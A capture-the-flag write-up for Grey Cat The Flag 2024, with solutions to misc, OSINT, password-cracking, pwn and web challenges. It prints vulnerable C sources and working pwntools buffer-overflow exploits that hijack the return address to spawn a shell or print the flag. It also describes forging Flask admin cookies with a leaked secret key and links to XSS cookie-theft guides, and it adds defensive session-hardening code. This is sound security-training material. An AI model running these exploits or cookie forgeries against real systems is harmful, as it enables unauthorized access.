---
# System prepended metadata

title: GREY CAT THE FLAG 2024
tags: [0n3_pu4ch_, CTF 2024, greycattheflag2024]

---


GREY CAT THE FLAG 2024
===




MISC ✅
---

### Cats At The Beach ✍️




### Grey Drivers ✍️
- First, you can see that Grey Cat is playing Helldivers 2 and left a note behind.
- So I searched for the game Helldivers 2 and found out that the list in the note is a list of weapon names from Helldivers 2.
- In this game every weapon needs a launch code to use. For example, the first weapon in the list, the Eagle 500kg Bomb, has this launch code (I found it on the game's wiki):
![image](https://hackmd.io/_uploads/ByYuwcf-A.png)
and we can follow the directions starting from home:

![image](https://hackmd.io/_uploads/SkghsI5MW0.png)

and for the first weapon, we have "grey{". Do the same for the other weapons in the list, and we have
> Flag: `grey{i3mm_e1w3st_2_n3oU10o3E!}`

### All About Timing ✍️

The challenge is all about guessing the right number. So at first I tried to rely on the time the server takes to respond and use binary search. However, it doesn't work, as the number changes constantly.

Then I realized the answer is the same if I submit fast enough (the server returns the right answer if we submit a wrong one).

#### Code:
```python
from pwn import *

def time_guess(guess):
    # One connection per attempt: read the prompt, send the guess, parse the reply
    conn = remote("challs.nusgreyhats.org", 31111)
    conn.recvuntil(b"Your guess:")
    conn.sendline(str(guess).encode())
    response = conn.recvline()
    # On a wrong guess the server reveals the number it was thinking of
    response = response.replace(b"Wrong answer! The number I was thinking of was", b"").strip()
    print(response.decode())
    conn.close()
    return response.decode()

# First attempt only serves to learn the current number...
start = 0
response1 = time_guess(start)
print(response1)
# ...then resubmit it immediately, before the number changes
response2 = time_guess(response1)
print(response2)
```


![image](https://hackmd.io/_uploads/BJAGJAmb0.png)

Here is the result. As for the flag:
> Flag: `grey{t1m3_i5_a_s0c1al_coNstRucT}`

### Cashhat The Ripper ✍️

- From the title, I guessed I could use John the Ripper.
- Although using this tool on Windows looks easy, it has some problems with the format of the hash file, e.g. "Error: UTF-16 BOM seen in input file.", which forces you to decode to UTF-8 before cracking the password.
- I use Kali Linux.
- First, we use `zip2john` to get the hash of this zip file:
![image](https://hackmd.io/_uploads/ryIp_RXW0.png)

Note: saving this hash to a txt file makes it easy for me to brute-force.

- Using John the Ripper (`john`), brute-force the password from the hash:
![image](https://hackmd.io/_uploads/SJcKFRQ-0.png)

- The password is: `123mango`
![image](https://hackmd.io/_uploads/rkMJs07ZC.png)

heheboizzz

> Flag: `flag{W34k_P4ssw0rds_St4Nd_n0_Ch4nc3}`
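The "UTF-16 BOM seen in input file" error above comes from how the hash file was saved: Windows PowerShell 5.1's `>` redirection writes UTF-16LE with a byte-order mark by default, which `john` does not read. As an added example (not part of the original write-up), the Python below detects a leading BOM, re-encodes the file as BOM-less UTF-8 and normalizes line endings so the file can be fed to `john` unchanged. The file names in the usage comment are placeholders; the byte strings in the docstrings are constructed.

```python
import codecs
import sys

# BOM signatures, longest first: the UTF-32-LE BOM (FF FE 00 00) begins with
# the UTF-16-LE BOM (FF FE), so testing UTF-16 first would misdetect it.
BOMS = (
    (codecs.BOM_UTF32_LE, "utf-32-le"),
    (codecs.BOM_UTF32_BE, "utf-32-be"),
    (codecs.BOM_UTF8, "utf-8"),
    (codecs.BOM_UTF16_LE, "utf-16-le"),
    (codecs.BOM_UTF16_BE, "utf-16-be"),
)


def detect_bom(data: bytes):
    """Return (bom_bytes, encoding) for a leading BOM, or (b"", None) if there is none."""
    for bom, enc in BOMS:
        if data.startswith(bom):
            return bom, enc
    return b"", None


def to_utf8_hash_file(data: bytes) -> bytes:
    """Re-encode a hash file as BOM-less UTF-8 with LF line endings.

    Blank lines are dropped so every remaining line is exactly one hash record,
    e.g. b"\\xff\\xfe" + "h1\\r\\n".encode("utf-16-le") becomes b"h1\\n".
    """
    bom, enc = detect_bom(data)
    text = data[len(bom):].decode(enc or "utf-8")
    lines = [ln.rstrip("\r") for ln in text.split("\n")]
    lines = [ln for ln in lines if ln.strip()]
    return ("\n".join(lines) + "\n").encode("utf-8")


if __name__ == "__main__":
    # usage: python fix_hash_encoding.py <hash_from_windows.txt> <hash_utf8.txt>
    src, dst = sys.argv[1], sys.argv[2]
    with open(src, "rb") as f:
        raw = f.read()
    bom, enc = detect_bom(raw)
    print(f"{src}: BOM={bom.hex() or 'none'} encoding={enc or 'utf-8 (assumed)'}")
    with open(dst, "wb") as f:
        f.write(to_utf8_hash_file(raw))
```

Running it on the exported hash file prints the detected encoding and writes a clean copy; a file that already is plain UTF-8 passes through with only its CRLF endings normalized.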



### Out In Plain Sight ✍️


- ![image](https://hackmd.io/_uploads/Sktph0QW0.png)


- "@nus.greyhats": first I guessed this is an Instagram or Twitter account, not Facebook (because it is not popular in Singapore).
- I OSINTed on Instagram first because I did not have an X account :))
- The nearest video looks suspicious.
![image](https://hackmd.io/_uploads/Skcr00mZC.png)
- I downloaded it and watched it at 0.5x speed.
![image](https://hackmd.io/_uploads/S15VkJE-C.png)
- I saw this cipher text (hex): `31 38 20 73 65 63 6f 6e 64 73`
- This means: `18 seconds`
- So I watched the video at 18 seconds more carefully.
![image](https://hackmd.io/_uploads/B1W3ky4-R.png)

> Flag: `grey{y0uR_eYeS_aRe_ShArP}`


Pwnable ✅
---

### Baby Goods ✍️

#### Overall
- Simple challenge
#### Script

*babygoods.c*
```cpp=
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char username[0x20];

int menu(char name[0x20]);

int sub_15210123() {
    execve("/bin/sh", 0, 0);
}

int buildpram() {
    char buf[0x10];
    char size[4];
    int num;

    printf("\nChoose the size of the pram (1-5): ");
    fgets(size,4,stdin);
    size[strcspn(size, "\r\n")] = '\0';
    num = atoi(size);
    if (1 > num || 5 < num) {
        printf("\nInvalid size!\n");
        return 0;
    }

    printf("\nYour pram has been created! Give it a name: ");
    //buffer overflow! user can pop shell directly from here
    gets(buf);
    printf("\nNew pram %s of size %s has been created!\n", buf, size);
    return 0;
}

int exitshop() {
    puts("\nThank you for visiting babygoods!\n");
    exit(0);
}

int menu(char name[0x20]) {
    char input[4];
    do {
        printf("\nHello %s!\n", name);
        printf("Welcome to babygoods, where we provide the best custom baby goods!\nWhat would you like to do today?\n");
        printf("1: Build new pram\n");
        printf("2: Exit\n");
        printf("Input: ");
        fgets(input, 4, stdin);
        input[strcspn(input, "\r\n")] = '\0';
        switch (atoi(input))
        {
        case 1:
            buildpram();
            break;
        default:
            printf("\nInvalid input!\n==========\n");
            menu(name);
        }
    } while (atoi(input) != 2);
    exitshop();
}

int main() {
	setbuf(stdin, 0);
	setbuf(stdout, 0);

    printf("Enter your name: ");
    fgets(username,0x20,stdin);
    username[strcspn(username, "\r\n")] = '\0';
    menu(username);
    return 0;
}
```
A simple buffer overflow in `buildpram()`:
```cpp!
gets(buf);
```

![image](https://hackmd.io/_uploads/B1ztIz4ZR.png)

```python=
from pwn import *

#r = process('./babygoods')
r = remote('challs.nusgreyhats.org', 32345)

# padding up to the saved return address, then the address of
# sub_15210123(), which calls execve("/bin/sh")
payload = b'A'*40
payload += p64(0x401236)
r.sendlineafter(b'Enter your name: ', b'Broder')
r.sendlineafter(b'Input: ', b'1')
r.sendlineafter(b'Choose the size of the pram (1-5): ', b'2')
r.sendlineafter(b'Your pram has been created! Give it a name: ', payload)
r.interactive()
```

### The Mororala ✍️
*chall.c*
```cpp=
#include <stdio.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>


char* pin;

// this is the better print, because i'm cool like that ;)
void slow_type(char* msg) {
	int i = 0;
	while (1) {
		if (!msg[i])
			return;
		putchar(msg[i]);
		usleep(5000);
		i += 1;
	}
}

void view_message() {
	int fd = open("./flag.txt", O_RDONLY);
	char* flag = calloc(0x50, sizeof(char));
	read(fd , flag, 0x50);
	close(fd);
	slow_type("\n\e[1;93mAfter several intense attempts, you successfully breach the phone's defenses.\nUnlocking its secrets, you uncover a massive revelation that holds the power to reshape everything.\nThe once-elusive truth is now in your hands, but little do you know, the plot deepens, and the journey through the clandestine hideout takes an unexpected turn, becoming even more complicated.\n\e[0m");
	printf("\n%s\n", flag);
	exit(0);
}

void retrieve_pin(){
	FILE* f = fopen("./pin", "r");
	pin = malloc(0x40);
	memset(pin, 0, 0x40);
	fread(pin, 0x30, 0x1, f);
	fclose(f);
}

void login() {
	char attempt[0x30];
	int count = 5;

	for (int i = 0; i < 5; i++) {
		memset(attempt, 0, 0x30);
		printf("\e[1;91m%d TRIES LEFT.\n\e[0m", 5-i);
		printf("PIN: ");
		scanf("%s", attempt);
		if (!strcmp(attempt, pin)) {
			view_message();
		}
	}
	slow_type("\n\e[1;33mAfter five unsuccessful attempts, the phone begins to emit an alarming heat, escalating to a point of no return. In a sudden burst of intensity, it explodes, sealing your fate.\e[0m\n\n");
}

void banner() {

	slow_type("\e[1;33mAs you breached the final door to TACYERG's hideout, anticipation surged.\nYet, the room defied expectations – disorder reigned, furniture overturned, documents scattered, and the vault empty.\n'Yet another dead end,' you muttered under your breath.\nAs you sighed and prepared to leave, a glint caught your eye: a cellphone tucked away under unkempt sheets in a corner.\nRecognizing it as potentially the last piece of evidence you have yet to find, you picked it up with a growing sense of anticipation.\n\n\e[0m");

    puts("                         .--.");
	puts("                         |  | ");
	puts("                         |  | ");
	puts("                         |  | ");
	puts("                         |  | ");
	puts("        _.-----------._  |  | ");
	puts("     .-'      __       `-.  | ");
	puts("   .'       .'  `.        `.| ");
	puts("  ;         :    :          ; ");
	puts("  |         `.__.'          | ");
	puts("  |   ___                   | ");
	puts("  |  (_M_) M O T O R A L A  | ");
	puts("  | .---------------------. | ");
	puts("  | |                     | | ");
	puts("  | |      \e[0;91mYOU HAVE\e[0m       | | ");
	puts("  | |  \e[0;91m1 UNREAD MESSAGE.\e[0m  | | ");
	puts("  | |                     | | ");
	puts("  | |   \e[0;91mUNLOCK TO VIEW.\e[0m   | | ");
	puts("  | |                     | | ");
	puts("  | `---------------------' | ");
	puts("  |                         | ");
	puts("  |                __       | ");
	puts("  |  ________  .-~~__~~-.   | ");
	puts("  | |___C___/ /  .'  `.  \\  | ");
	puts("  |  ______  ;   : OK :   ; | ");
	puts("  | |__A___| |  _`.__.'_  | | ");
	puts("  |  _______ ; \\< |  | >/ ; | ");
	puts("  | [_=]						\n");

	slow_type("\e[1;94mLocked behind a PIN, you attempt to find a way to break into the cellphone, despite only having 5 tries.\e[0m\n\n");
}


void init() {
	setbuf(stdin, 0);
	setbuf(stdout, 0);
	retrieve_pin();
	printf("\e[2J\e[H");
}

int main() {
	init();
	banner();
	login();
}

```


In `login()`, you can see a ***buffer overflow***:

```cpp!
scanf("%s", attempt);
```

And `view_message()` is the function that prints the flag:

```cpp=
void view_message() {
	int fd = open("./flag.txt", O_RDONLY);
	char* flag = calloc(0x50, sizeof(char));
	read(fd , flag, 0x50);
	close(fd);
	slow_type("\n\e[1;93mAfter several intense attempts, you successfully breach the phone's defenses.\nUnlocking its secrets, you uncover a massive revelation that holds the power to reshape everything.\nThe once-elusive truth is now in your hands, but little do you know, the plot deepens, and the journey through the clandestine hideout takes an unexpected turn, becoming even more complicated.\n\e[0m");
	printf("\n%s\n", flag);
	exit(0);
}
```

Basically, you only have to calculate the offset to the return address.

![image](https://hackmd.io/_uploads/HJP0lzNZA.png)

***However, the problem happens here***

![image](https://hackmd.io/_uploads/rkzqMMNbA.png)

#### **See the solution in my ROP write up(ret2win):** [Rop Emporium](https://hackmd.io/@Broder/RopEmporium)

```python=
from pwn import *
win = p64(0x40138e)  # view_message(), the function that prints the flag
ret = p64(0x40101a)  # a single `ret` gadget placed before win (see the linked ROP write-up)
#r = process('./chall')
r = remote('challs.nusgreyhats.org', 30211)
offset = b'a'*72     # padding up to the saved return address of login()

payload = offset
payload += ret
payload += win
r.sendlineafter(b'PIN: ', payload)
r.interactive()
```
WEB 
---
### Baby-web
"I just learnt how to design my favourite flask webpage using htmx and bootstrap. I hope I don't accidentally expose my super secret flag."


- First, I checked the Python code:
![image](https://hackmd.io/_uploads/ryM11gLZ0.png)
- You can see that it is a Flask application written in Python.
- It also has `secret_key = "baby-web"`, and I see the value `is_admin = False`.
- For a Flask application, we use the tool [flask-unsign](https://github.com/Paradoxis/Flask-Unsign) together with what we have seen in the source code: flask-unsign can forge a cookie that allows us to bypass admin. Use the following command:
![image](https://hackmd.io/_uploads/rkRkwGUbR.png)
and the result:
![image](https://hackmd.io/_uploads/SkUfvG8-0.png)
Now I change the cookie so that I can access admin.
![image](https://hackmd.io/_uploads/SJDrPfIWC.png)
But it isn't done yet. I check the source code and find this hidden button:
![image](https://hackmd.io/_uploads/r1nYDf8WR.png)
All I need to do now is modify the source code so that the secret button appears (delete `hidden`).
![image](https://hackmd.io/_uploads/rJTpPf8bC.png)
And here comes the flag
> Flag: `grey{0h_n0_mY_5up3r_53cr3t_4dm1n_fl4g}`
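The two weaknesses used above are a secret key hard-coded as `"baby-web"` and an authorization flag (`is_admin`) stored in the client's cookie. As an added example that is not part of the original write-up or the challenge code, the Python below models a signed session cookie (a simplified HMAC scheme, not Flask's exact itsdangerous wire format) to show what the signature does and does not guarantee, together with the two fixes: load a long random key from configuration and decide admin status from the server-side user record, not from the cookie. The `SESSION_SECRET_KEY` variable name and the `user_db` records are assumptions for illustration.

```python
import base64
import hashlib
import hmac
import json
import secrets


def _b64(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _unb64(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def sign_session(payload: dict, secret_key: bytes) -> str:
    """Serialise and MAC a session dict as <base64 json>.<base64 mac>.

    Nothing is encrypted: the payload is readable by anyone holding the cookie,
    and the MAC proves only that it was produced by someone who knows secret_key.
    """
    body = _b64(json.dumps(payload, sort_keys=True).encode())
    mac = hmac.new(secret_key, body.encode(), hashlib.sha256).digest()
    return f"{body}.{_b64(mac)}"


def verify_session(cookie: str, secret_key: bytes):
    """Return the session dict if the MAC verifies under secret_key, else None."""
    body, sep, mac_b64 = cookie.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(secret_key, body.encode(), hashlib.sha256).digest()
    try:
        if not hmac.compare_digest(expected, _unb64(mac_b64)):
            return None  # tampered body, or signed with a different key
        return json.loads(_unb64(body))
    except ValueError:  # bad base64 / bad JSON
        return None


def load_secret_key(env: dict) -> bytes:
    """Fetch the signing key from configuration, refusing short or missing values.

    A literal such as secret_key = "baby-web" in the source lets anyone with the
    code (or a wordlist) re-create valid signatures for any payload they choose.
    """
    key = env.get("SESSION_SECRET_KEY", "")
    if len(key.encode()) < 32:
        raise ValueError("SESSION_SECRET_KEY must be at least 32 bytes; "
                         "generate one with secrets.token_hex(32)")
    return key.encode()


def is_admin(session: dict, user_db: dict) -> bool:
    """Authorization comes from the server-side record; any is_admin in the cookie is ignored."""
    record = user_db.get(session.get("user"))
    return record is not None and record.get("role") == "admin"


if __name__ == "__main__":
    user_db = {"alice": {"role": "user"}, "root": {"role": "admin"}}  # constructed records
    weak_key = b"baby-web"  # the literal from the challenge source
    # The MAC cannot distinguish a cookie signed by the key holder from one the
    # server issued, so with a known key the is_admin flag is attacker-controlled...
    cookie = sign_session({"user": "alice", "is_admin": True}, weak_key)
    session = verify_session(cookie, weak_key)
    print("cookie verifies:", session is not None)
    # ...but authorization that consults the user record is unaffected:
    print("alice is admin:", is_admin(session, user_db))
    try:
        load_secret_key({"SESSION_SECRET_KEY": "baby-web"})
    except ValueError as e:
        print("rejected weak key:", e)
    strong = load_secret_key({"SESSION_SECRET_KEY": secrets.token_hex(32)})
    print("loaded", len(strong), "byte key")
```

The design point is that signing addresses integrity against parties who do not hold the key; it says nothing about confidentiality or about who may hold the key. Keeping the privilege decision server-side means a leaked or weak key exposes session integrity, not admin access.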
### Markdown parser
"I built this simple markdown parser. Please give me some feedback (in markdown), I promise to read them all. Current features include: bold, italics, code blocks with syntax highlighting!"

- First, I check the source code and the markdown code. The source code doesn't seem to provide anything useful, so I look at the markdown code.
![image](https://hackmd.io/_uploads/rJKsqww-0.png)
- If a line starts with \`\`\` it will be in a code block, and the code block's HTML output is different from the others. This leads us to the prevalent web vulnerability, XSS.
- I had to research how XSS works and what it can do. You can see it in the link below:
https://www.go4expert.com/articles/stealing-cookie-xss-t17066/
Briefly, it is a vulnerability where you can inject your code through client input; it can help you steal cookies.
- To fetch cookies using XSS, follow this, using Burp Suite Collaborator:
https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-stealing-cookies






UNSOLVED CHALLENGES!!!
===

MISC 🔥 (N_Muggle)
---

### ....✍️

Web 🔥 (Hyber)
---

### ....✍️

Pwnable 🔥 (Broder)
---

### ....✍️

Reverse 🔥 (AhnMaph)
---

### ....✍️

Crypto 🔥 (dvt)
---

### ....✍️

###### tags: `0n3_pu4ch_` `greycattheflag2024`
